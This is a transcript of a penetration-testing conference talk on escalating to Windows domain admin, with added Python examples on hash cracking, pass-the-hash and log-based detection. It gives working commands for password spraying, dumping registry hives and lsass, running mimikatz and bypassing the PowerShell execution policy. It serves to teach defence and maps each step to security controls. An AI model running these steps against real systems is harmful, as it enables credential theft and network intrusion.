
Stealing Domain Admin (or How I Learned to Stop Worrying and Love the CSSF)

With global information security spending rapidly approaching $100 billion, you'd think we'd have a pretty good handle on preventing data breaches by now. However, considering that nearly 1 billion records have been exposed in the 5000+ data breaches publicly disclosed since 2005, you're probably asking yourself the same question as security and risk management professionals all over the world: How does this keep happening? This presentation will walk you through a penetration tester's process, step by step, as the tester goes from unauthorized outsider to domain admin (without being detected). More importantly, we'll discuss the fundamental security controls that will shut down attackers time and again.


slandail

March 07, 2018

Transcript

  1. STEALING DOMAIN ADMIN (OR HOW I LEARNED TO STOP WORRYING AND LOVE THE CSSF)
     Jerod Brennen
  2. WHO AM I?
     • Jerod Brennen
     • Security Solutions Architect, One Identity
     • Alphabet Soup: ACE, CISSP, GWAPT, GWEB
  3. THE CHALLENGE

  4. HANDBASKETS, ANYONE?

  5. LET’S PLAY FIND THE WHITESPACE From http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

  6. BROKEN RECORD… BROKEN RECORD… BROKEN RECORD…

  7. CHOOSE YOUR OWN ADVENTURE

  8. PEN TEST FLOW

  9. TEN EIGHT STEP PROGRAM
     • Step 1: Gather OSINT
     • Step 2: Score Some Creds
     • Step 3: Logon to an Internal System
     • Step 4: Dump SAM/System/Security Hives
     • Step 5: Extract Hashes and Get Cracking
     • Step 6: Identify Admin Accounts
     • Step 7: Find Active DA Logins
     • Step 8: Pass the Hash
  10. STEP 1: GATHER OSINT (OPEN SOURCE INTELLIGENCE)
     • Google search
       • site:company_website.com "contact"
     • Maltego
       • https://www.paterva.com/
       • Transform: To Email Address [using Search Engine]
     • LinkedIn company search
     • Data.com Connect
       • https://connect.data.com/
     • EmailHarvester
       • https://github.com/maldevel/EmailHarvester
     • Discover (Lee Baird)
       • https://github.com/leebaird/discover
  11. STEP 2: SCORE SOME CREDS
     • Brute Force Attack
       • Lots of usernames, lots of passwords
     • Password Spray Attack
       • Lots of usernames, VERY few passwords (one or two per lockout observation window, so no account is locked out and no per-account failure threshold trips)
       • ./ntlm-botherer.py -U ./users.txt -p Winter2018 -d target_domain.com https://webdir2a.online.lync.com/Autodiscover/AutodiscoverService.svc/root/oauth/user?originalDomain=target_domain.com/WebTicket/WebTicketService.svc
     • Burp Suite Intruder / Cluster Bomb
       • https://portswigger.net/burp/help/intruder_using.html
       • https://portswigger.net/burp/help/intruder_positions.html
     • MailSniper
       • https://github.com/dafthack/MailSniper
  12. STEP 3: LOGON TO AN INTERNAL SYSTEM
     • Passive Intel
       • Shodan - https://shodan.io/
       • Censys - https://censys.io/
       • Search Engines
         • site:company.com inurl:login
         • site:company.com sitemap.xml
     • Active Intel
       • nmap -Pn -sS xxx.xxx.xxx.0/24 -p 21-23,80,443,3389,5800,5900,8443
     • Remote Administration Tools
       • Bomgar, GoToMeeting, TeamViewer, Join.me, Splashtop, LogMeIn, WebEx
     • Physical/Wireless Network Access
  13. STEP 4: DUMP SAM/SYSTEM/SECURITY HIVES
     • Dump the hives
       • reg.exe save hklm\sam c:\sam.save
       • reg.exe save hklm\system c:\system.save
       • reg.exe save hklm\security c:\security.save
         • This one may require elevated privileges
         • If so, psexec.exe -i -s cmd.exe, then execute within the new command prompt window
     • While you're there, scope out users & groups
       • net user /domain > domain_users.txt
       • net groups /domain > domain_groups.txt
     • Exfiltrate
       • Box, Dropbox, Google Drive, OneDrive, ShareFile
  14. STEP 5: EXTRACT HASHES AND GET CRACKING
     • Extract hashes with Impacket (offline)
       • https://github.com/CoreSecurity/impacket
       • secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
     • Crack SAM hashes
       • LM -> Ophcrack (or hashcat -m 3000)
       • NT -> hashcat (-m 1000) or John the Ripper
       • HashKiller - https://hashkiller.co.uk/ntlm-decrypter.aspx
     • Crack domain creds
       • The SAM only holds local accounts; domain creds on a member machine come from the cached domain logons (DCC2 / mscash2) that secretsdump pulls from the SECURITY hive, crackable with hashcat -m 2100 but far slower than NT hashes
       • hashcat or John the Ripper
  15. STEP 6: IDENTIFY ADMIN ACCOUNTS
     • Impacket output
       • Administrator = RID 500 ("the dash 500 account", the :500: field in the pwdump-style output); the built-in administrator keeps RID 500 even if it has been renamed, so match on the RID, not the name
     • Verify Local Admins
       • net localgroup administrators
     • Dump Active Directory
       • AD Users and Computers
       • Apache Directory Studio
       • Softerra LDAP Administrator/Browser
       • LDAP Admin (portable?)
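Steps 5 and 6 in code, as an added example that is not from the deck: it parses secretsdump's pwdump-style output, picks out the RID 500 account by RID rather than by name, flags accounts that still store an LM hash, finds accounts that share an NT hash, and runs a small dictionary attack by recomputing NT hashes (MD4 over the UTF-16LE password). The dump text, account names, the jdoe hash and the wordlist are constructed; the MD4 routine is included because hashlib's MD4 is unavailable on many OpenSSL 3 builds.

```python
import struct

# Well-known sentinel values (public constants, not secrets).
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash when no LM password is stored
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
BUILTIN_ADMIN_RID = 500


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib.new('md4') is missing on many OpenSSL 3 builds)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    rounds = (  # (boolean function, word order, per-step rotations, additive constant)
        (lambda x, y, z: (x & y) | (~x & z), range(16), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for f, order, shifts, k in rounds:
            for j, i in enumerate(order):
                a = _rol((a + f(b, c, d) + X[i] + k) & 0xFFFFFFFF, shifts[j % 4])
                a, b, c, d = d, a, b, c      # rotate registers; 16 steps bring them back in place
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password; this is what hashcat -m 1000 attacks."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str):
    """Parse secretsdump's user:rid:lmhash:nthash::: lines, skipping the [*] banner lines."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if not line.strip() or line.startswith("[") or len(parts) < 4:
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts


def builtin_admin(accounts):
    """The built-in Administrator keeps RID 500 even when renamed: match the RID, not the name."""
    return next((a for a in accounts if a["rid"] == BUILTIN_ADMIN_RID), None)


def lm_enabled(accounts):
    """Accounts still storing an LM hash (trivially crackable: Ophcrack / hashcat -m 3000)."""
    return [a["user"] for a in accounts if a["lm"] != BLANK_LM]


def shared_passwords(accounts):
    """Identical NT hashes mean identical passwords: crack one account, own all of them."""
    by_hash = {}
    for a in accounts:
        if a["nt"] != BLANK_NT:
            by_hash.setdefault(a["nt"], []).append(a["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def crack(accounts, wordlist):
    """Dictionary attack: one MD4 per candidate, then a dictionary lookup per account."""
    lookup = {nt_hash(w): w for w in wordlist}
    lookup[BLANK_NT] = ""                      # empty password (usually a disabled account)
    return {a["user"]: lookup[a["nt"]] for a in accounts if a["nt"] in lookup}


# Constructed sample in secretsdump's LOCAL output format (not real dump data).
SAMPLE_DUMP = """\
[*] Target system bootKey: 0x0123456789abcdef0123456789abcdef
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
helpdesk:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
jdoe:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

if __name__ == "__main__":
    accts = parse_pwdump(SAMPLE_DUMP)
    print("RID 500 account:", builtin_admin(accts)["user"])
    print("LM hash still stored for:", lm_enabled(accts))
    print("shared NT hashes:", shared_passwords(accts))
    print("cracked:", crack(accts, ["Winter2018", "Summer2018", "password"]))
```

In the sample, Administrator and helpdesk share a hash and both fall to the wordlist, helpdesk still has an LM hash stored, and jdoe survives the wordlist; a real run would hand jdoe's line to hashcat instead.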
  16. STEP 7: FIND ACTIVE DA LOGINS
     • PowerShell Empire (Invoke-UserHunter itself comes from PowerView in PowerSploit's Recon module)
       • https://github.com/PowerShellMafia/PowerSploit
       • https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
     • Invoke-UserHunter
       • Input options: individual username, list of usernames, domain group, list of hosts
     • PowerShell ProTip
       • powershell -exec bypass
  17. STEP 8: PASS THE HASH
     • Invoke-TheHash
       • https://github.com/Kevin-Robertson/Invoke-TheHash
     • Dump lsass (Local Security Authority Subsystem Service)
       • Start > Run > taskmgr.exe
       • Show processes from all users
       • lsass.exe > Right Click > Create dump file
       • c:\Users\username\AppData\Local\Temp\lsass.DMP
     • Grab passwords from lsass
       • Online (on the compromised host) -> procdump.exe -ma lsass.exe lsass.dmp
         • https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
       • Offline (on your own box, against the .DMP) -> mimikatz: sekurlsa::minidump lsass.dmp, then sekurlsa::logonpasswords
         • https://github.com/gentilkiwi/mimikatz
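What pass-the-hash actually exploits, as an added example that is neither the deck's nor Invoke-TheHash's code: the NTLMv2 computation from MS-NLMP, done on the client side from a stolen NT hash and checked on the server side from the same stored hash. Neither side ever needs the password, which is why a dumped NT hash is password-equivalent. The user, domain, challenges, timestamp and NT hash are constructed, and the TargetInfo is trimmed to a single AV pair.

```python
import hashlib
import hmac
import struct

# Constructed values for the walk-through (not from a real capture).
STOLEN_NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")  # NT hash of "password"
USER, DOMAIN = "jdoe", "CORP"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")   # 8-byte nonce from CHALLENGE_MESSAGE
CLIENT_CHALLENGE = bytes.fromhex("aaaaaaaaaaaaaaaa")   # 8-byte nonce chosen by the client
TIMESTAMP = 0x01D3B5F0A2C4E600                          # FILETIME, constructed


def av_pairs(domain: str) -> bytes:
    """Minimal TargetInfo: MsvAvNbDomainName (0x0002) followed by MsvAvEOL (0x0000)."""
    d = domain.encode("utf-16-le")
    return struct.pack("<HH", 0x0002, len(d)) + d + struct.pack("<HH", 0x0000, 0)


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """MS-NLMP 3.3.2: HMAC-MD5 keyed with the NT hash over UPPER(user)+domain in UTF-16LE.
    The input is the NT hash itself; the password never appears."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_temp(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """The 'blob' the proof covers: version bytes, reserved, time, client nonce, TargetInfo."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(nt_hash: bytes, user: str, domain: str, server_challenge: bytes,
                    timestamp: int, client_challenge: bytes, target_info: bytes):
    """Client side of pass-the-hash: NtChallengeResponse = NTProofStr || temp, plus SessionBaseKey."""
    key = ntowf_v2(nt_hash, user, domain)
    temp = ntlmv2_temp(timestamp, client_challenge, target_info)
    nt_proof = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    session_base_key = hmac.new(key, nt_proof, hashlib.md5).digest()
    return nt_proof + temp, session_base_key


def verify_response(stored_nt_hash: bytes, user: str, domain: str, server_challenge: bytes,
                    nt_challenge_response: bytes) -> bool:
    """Server/DC side: recompute NTProofStr from the stored NT hash and the client's temp blob.
    The verifier also only ever holds the hash, so whoever has the hash can authenticate."""
    nt_proof, temp = nt_challenge_response[:16], nt_challenge_response[16:]
    key = ntowf_v2(stored_nt_hash, user, domain)
    expected = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(expected, nt_proof)


def demo():
    """Authenticate with the stolen hash alone; then show a wrong hash is rejected."""
    target_info = av_pairs(DOMAIN)
    response, _ = ntlmv2_response(STOLEN_NT_HASH, USER, DOMAIN, SERVER_CHALLENGE,
                                  TIMESTAMP, CLIENT_CHALLENGE, target_info)
    accepted = verify_response(STOLEN_NT_HASH, USER, DOMAIN, SERVER_CHALLENGE, response)
    wrong_hash = bytes.fromhex("31d6cfe0d16ae931b73c59d7e0c089c0")  # NT hash of "", not jdoe's
    rejected = verify_response(wrong_hash, USER, DOMAIN, SERVER_CHALLENGE, response)
    return accepted, rejected


if __name__ == "__main__":
    print(demo())  # (True, False)
```

Tools such as Invoke-TheHash wrap exactly this computation in a real SMB or WMI session; the defensive consequence is that a hash dumped from any box where a DA has logged on interactively is as good as the DA's password until that password is changed.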
  18. STEP 9: CELEBRATE (OPTIONAL)

  19. NOTHING NEW UNDER THE SUN
     • Dumping Windows Credentials (December 20, 2013)
       • https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/
     • I Hunt Sys Admins (January 19, 2015)
       • http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
     • Password Spraying Outlook Web Access (February 17, 2016)
       • http://www.blackhillsinfosec.com/?p=4694
  20. WHAT IF I TOLD YOU…

  21. SIMPLICITY IS KEY

  22. COMMON SENSE SECURITY FRAMEWORK
     • Seven (7) Areas of Protection
       • Protect Your Applications
       • Protect Your Endpoints
       • Protect Your Network
       • Protect Your Servers
       • Protect Your Data
       • Protect Your Locations
       • Protect Your People
     • Three (3) Yes/No Questions per Area
     • Guidance (free, open source, commercial)
     • https://commonsenseframework.org/
  23. WHO DOESN’T LOVE SPREADSHEETS?

  24. WHO DOESN’T LOVE GRAPHS?

  25. EVERY BREATH YOU TAKE… EVERY MOVE YOU MAKE…
     Step                               Control
     Gather OSINT                       S01 - Do you follow documented system hardening procedures to secure your servers?
     Score Some Creds                   D02 - Do you periodically review employee account security to ensure that access is appropriate (i.e., least privilege, individual accounts, strong passwords)?
     Logon to an Internal System        N03 - Do you require two factor authentication for remote/VPN access, as well as access to third party (hosted) applications?
     Dump SAM/System/Security Hives     S02 - Do you centrally store and actively monitor critical security logs for suspicious events (such as abnormal admin account activity)?
     Extract Hashes and Get Cracking    See S02
     Identify Admin Accounts            E02 - Do you limit local administrator account usage?
     Find Active DA Logins              See S02
     Pass the Hash                      See S02
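The S02 control applied to Steps 2 and 7, as an added example that is not part of the deck: two detections run over constructed Windows Security events (4625 failed logon, 4624 successful logon) flattened to key=value lines the way a log forwarder might emit them. The first flags a password spray by counting distinct target accounts per source address inside a time window, which per-account lockout counters miss by design; the second flags a Domain Admin logging on interactively (console, RDP, cached) to anything that is not a domain controller, which is the session Invoke-UserHunter looks for and the credential Step 8 lifts from LSASS. Hostnames, addresses, the DA list and the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events (not real log data). One source sprays one password across six accounts
# and lands on fmartin; cdavis fat-fingers a console logon twice; a DA logs on three ways.
SAMPLE_EVENTS = """\
2018-03-07T09:00:01 EventID=4625 TargetUserName=asmith IpAddress=203.0.113.7 LogonType=3 Computer=EXCH01
2018-03-07T09:00:03 EventID=4625 TargetUserName=bjones IpAddress=203.0.113.7 LogonType=3 Computer=EXCH01
2018-03-07T09:00:05 EventID=4625 TargetUserName=cdavis IpAddress=203.0.113.7 LogonType=3 Computer=EXCH01
2018-03-07T09:00:08 EventID=4625 TargetUserName=dkim IpAddress=203.0.113.7 LogonType=3 Computer=EXCH01
2018-03-07T09:00:11 EventID=4625 TargetUserName=elee IpAddress=203.0.113.7 LogonType=3 Computer=EXCH01
2018-03-07T09:00:14 EventID=4625 TargetUserName=fmartin IpAddress=203.0.113.7 LogonType=3 Computer=EXCH01
2018-03-07T09:00:20 EventID=4624 TargetUserName=fmartin IpAddress=203.0.113.7 LogonType=3 Computer=EXCH01
2018-03-07T09:15:00 EventID=4625 TargetUserName=cdavis IpAddress=10.0.0.5 LogonType=2 Computer=WKS-017
2018-03-07T09:15:09 EventID=4625 TargetUserName=cdavis IpAddress=10.0.0.5 LogonType=2 Computer=WKS-017
2018-03-07T09:15:20 EventID=4624 TargetUserName=cdavis IpAddress=10.0.0.5 LogonType=2 Computer=WKS-017
2018-03-07T10:02:00 EventID=4624 TargetUserName=da_admin IpAddress=10.0.0.9 LogonType=3 Computer=FS01
2018-03-07T10:05:00 EventID=4624 TargetUserName=da_admin IpAddress=10.0.0.9 LogonType=2 Computer=DC01
2018-03-07T10:41:00 EventID=4624 TargetUserName=da_admin IpAddress=10.0.0.9 LogonType=10 Computer=WKS-042
"""

# Logon types whose credentials end up in LSASS on the target: console, RDP, cached interactive.
INTERACTIVE_LOGON_TYPES = {"2", "10", "11"}


def parse_events(text: str):
    """Turn 'timestamp key=value ...' lines into dicts with a datetime under 'ts'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        ev = dict(f.split("=", 1) for f in fields)
        ev["ts"] = datetime.fromisoformat(ts)
        events.append(ev)
    return events


def failures_per_user(events):
    """What a per-account lockout policy sees: the spray adds only one failure per account."""
    counts = defaultdict(int)
    for e in events:
        if e["EventID"] == "4625":
            counts[e["TargetUserName"]] += 1
    return dict(counts)


def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Alert when one source address fails against >= min_users distinct accounts inside window."""
    by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == "4625":
            by_ip[e["IpAddress"]].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):          # slide a window anchored on each failure
            users = {e["TargetUserName"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            if len(users) >= min_users:
                alerts.append({"ip": ip, "start": start["ts"], "users": len(users)})
                break                            # one alert per source is enough
    return alerts


def detect_da_interactive(events, domain_admins, domain_controllers):
    """Alert on a DA's interactive logon anywhere but a DC: that is where the hash gets left behind."""
    return [{"user": e["TargetUserName"], "computer": e["Computer"],
             "logon_type": e["LogonType"], "ts": e["ts"]}
            for e in events
            if e["EventID"] == "4624" and e["TargetUserName"] in domain_admins
            and e["LogonType"] in INTERACTIVE_LOGON_TYPES
            and e["Computer"] not in domain_controllers]


if __name__ == "__main__":
    ev = parse_events(SAMPLE_EVENTS)
    print("max failures on any one account:", max(failures_per_user(ev).values()))
    print("spray alerts:", detect_spray(ev))
    print("DA on non-DC:", detect_da_interactive(ev, {"da_admin"}, {"DC01"}))
```

On the sample, no account ever exceeds three failures, so a lockout threshold of five never fires, while the per-source view catches six accounts in thirteen seconds; the DA's network logon to FS01 (type 3) and console logon to DC01 are left alone, and only the RDP session on WKS-042 is flagged.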
  26. UNSUNG HERO

  27. A FEW FINAL COMMENTS

  28. LEADERSHIP NEEDS CONTEXT
     • Information Security Spending Will Top $101 Billion By 2020
       • http://www.darkreading.com/operations/information-security-spending-will-top-$101-billion-by-2020/d/d-id/1327178
     • World's Biggest Data Breaches
       • http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
     • Privacy Rights Clearinghouse's Chronology of Data Breaches
       • https://www.privacyrights.org/data-breaches
     • Verizon Data Breach Investigations Report (DBIR)
       • http://www.verizonenterprise.com/verizon-insights-lab/dbir/
  29. YOUR HOMEWORK
     • Self-assess your organization against the CSSF
     • Schedule a red team / blue team exercise using these steps as a guide
     • Post mortem the exercise
     • Update policies, procedures, and standards based on the post mortem
     • Sit down with leadership (steering committee) and share what you learned
     • Fix all the things!
  30. QUESTIONS / COMMENTS / DISCUSSION

  31. CONTACT INFO
     • Email - jerod.brennen@oneidentity.com
     • LinkedIn - https://www.linkedin.com/in/slandail/
     • Twitter - https://twitter.com/slandail
     • GitHub - https://github.com/slandail
     • SlideShare - https://www.slideshare.net/JerodBrennenCISSP
     • Speaker Deck - https://speakerdeck.com/slandail/